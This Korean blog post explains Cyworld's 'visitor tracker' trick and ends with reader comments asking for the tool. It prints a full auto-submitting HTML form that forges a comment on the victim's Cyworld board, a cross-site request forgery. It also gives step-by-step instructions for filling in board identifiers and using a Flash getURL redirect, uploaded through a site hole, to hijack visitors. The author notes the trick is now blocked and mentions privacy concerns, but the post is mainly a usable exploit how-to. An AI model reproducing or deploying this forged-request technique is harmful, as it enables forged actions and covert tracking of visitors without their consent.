드디어 막혔다고 한다.. 훗
글 초입에 밝힌다. 이따위 저질 프로그램을 도토리까지 줘가며 받는 사람은 없어야한다. 아래의 내용은 비록, 도토리로 거래되는 프로그램에 비해서 질적으로 부족하긴 하지만, 이런 프로그램 같잖은 장난질하는 녀석을 구하고자, 지식인에 답글을 달아 프로그램을 주겠다는 사이트나 카페를 홍보해줄 정도로 가치있는 프로그램은 아니다. 또한 제작방법을 공개한후 퍼질대로 퍼졌으니, 이를 모르는 이용자에겐 미안하지만, 막히기전까진 사생활 침해라는 태그를 달고 다니겠지만, 난 모르겠다.
어제는 AC3Korea 에서 싸이 방문자를 추적하는 방법에 대한 논란이 일고있어서, 미니홈피 관리를 포기했음에도 불구하고, 그놈의 호기심때문에....
플래쉬 파일에 geturl 액션스크립트를 이용해 다른 페이지로 이동시킨 뒤 그 페이지에서 폼값을 싸이월드 게시판쪽으로 임의로 넘기고, 게시판에 댓글이 달리게 한다.
<html>
<HEAD>
<SCRIPT>
function timeVal() {
var time = new Date()
var yy = time.getYear()
var mm = time.getMonth() + 1
var dd = time.getDate()
var hour = time.getHours()
var minute = time.getMinutes()
var second = time.getSeconds()
var pos_val = " "
pos_val += yy + "년 " + mm + "월 " + dd + "일" + " " + ((hour > 12) ? (hour - 12) : hour)
pos_val += ((minute < 10) ? ":0" : ":") + minute
pos_val += ((second < 10) ? ":0" : ":") + second
pos_val += (hour >= 12) ? " PM" : " AM"
pos_val += "○"
return pos_val;
}
</SCRIPT>
</HEAD>
<BODY onload=javascript:document.form1.content.value=timeVal();document.form1.submit()>
<FORM id=form1 name=form1 action=http://minihp.cyworld.nate.com/pims/board/general/board_replyok.asp method=post>
<INPUT type=hidden value=XXXXXXXX name=tid>
<INPUT type=hidden value=XX name=board_no>
<INPUT type=hidden value=XXXXXXXX name=item_seq>
<INPUT type=hidden value=1 name=cpage>
<INPUT type=hidden name=search_type>
<INPUT type=hidden name=search_keyword>
<INPUT type=hidden name=domain>
<INPUT type=hidden value=0 name=breply>
<INPUT type=hidden name=review_seq>
<INPUT class=input2 style="WIDTH: 200px" value="pos_val" name=content>
</FORM>
</BODY>
</html>
XXXXXX 들로 처리된 부분은 댓글이 남겨질 게시물을 임의의 게시판에 남겨둔후 게시판 목록에서 그 글을 새창으로 읽어들여 ( Shift + 클릭 ) 주소창의 tid, board_no, item_seq 옆의 숫자들을 베껴다 적으면 될 것이다.
폼 태그에 액션 부분에 지정된것이 게시판에 리플을 등록하는 파일인데 그 파일에 임의로 이것저것 폼값을 던져준다. 사용자의 고유 번호와 게시판번호 게시글 번호.. 아래는 쓸데 없는 것이겠고.. 마지막으로 시간정보가 담겨있는 댓글내용까지..
getURL 괄호 안에 쌍따옴표가 없어서 많은 논란이 일었었다.
이렇게 생성된 플래쉬파일을 직접 업로딩하거나 (주소 조작)
광장에 올린뒤 스크랩하는 방법으로 , 사진첩에 퍼오거나..
어떻게든 메인에 올려주게 되면 지정된 페이지로의 납치가 일어난다.
그 지정된 페이지에는 좀더 상단에 있던 HTML 소스가 들어있고 댓글을 달게 된다.
응용력 뛰어난 사람들은 납치페이지에 이미지를 넣는 등 가르쳐 주지 않은 것들도 이것 저것 해서 아름다운 싸이를 만들어 놓은 것을 볼 수 있었다.
하지만 굳이 자신의 흔적을 남기고 싶지 않았던 사람들이, 비밀스럽게 찾아왔음에도 불구하고 저런식으로 미니홈피의 주인이 자신의 접속 정보를 알 수 있다면 과연 다시 그 미니홈피에 찾아가고 싶을까 하는 생각도 든다.
플래쉬 파일을 싸이의 구멍을 통해 올린후 메인에 걸고 그 메인에서 자동으로 게시판에 댓글을 남기게 하는, 누가 가져다 붙인 말인진 모르겠지만 2세대 싸이 방문자 추적.
간단한 스크립트지만 폼값 임의 전송의 교묘함과, 대형 포탈 사이트의 헛점을 엿볼 수 있는 계기가 되었다.
이 글을 포스팅한지 5일이 지났다. 다른 곳에도 많이 포스팅 된 모습을 볼 수 있으나, 싸이의 대응은 없다. 고작 광장에 플래쉬를 못올리게 막았을 뿐이다. 얼른, 게시판 댓글다는 스크립트가 있는 파일을 수정해야 할 것이다.
댓글을 달아 주세요
컴맹이라서 무슨 말인지 하나도 모르겠어요 ㅠ.ㅠ 님 미니홈피에 올려주심 안될까요? 퍼갈수있도록....
진짜 너무 궁금해죽겠는데 방법은 모르겠고...;;;
미니홈피에 올려서 스크랩해서 되는 문제는 아니죠..
방법 공개했더니 여기저기 많이 퍼져있던데, 조금만 검색하시면
좀 더 자세한 설명을 찾을 수 있을듯;
ㅠㅠㅠ왜안대졍?ㅠ
이 자료는 무려 3년 묵은 자료라서요..
추적기 다운어떡해해야해요?그럼? 부탁드려요 ㅠ
이제 이 블로그에서 추적기는 다루지 않아요~